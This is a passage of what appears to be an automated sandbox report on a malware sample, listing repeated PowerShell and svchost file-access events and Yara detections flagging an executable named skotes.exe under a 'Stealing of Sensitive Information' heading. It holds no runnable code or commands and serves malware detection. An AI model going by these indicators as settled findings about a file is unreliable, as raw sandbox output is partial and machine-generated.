Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00EDCBEA

Stealing of Sensitive Information

Source: Yara match File source: 6.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2080301971.0000000005470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041944426.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2082994524.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2672497504.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2123212600.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2120598365.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2082959480.0000000000311000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3282216194.0000000000EC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY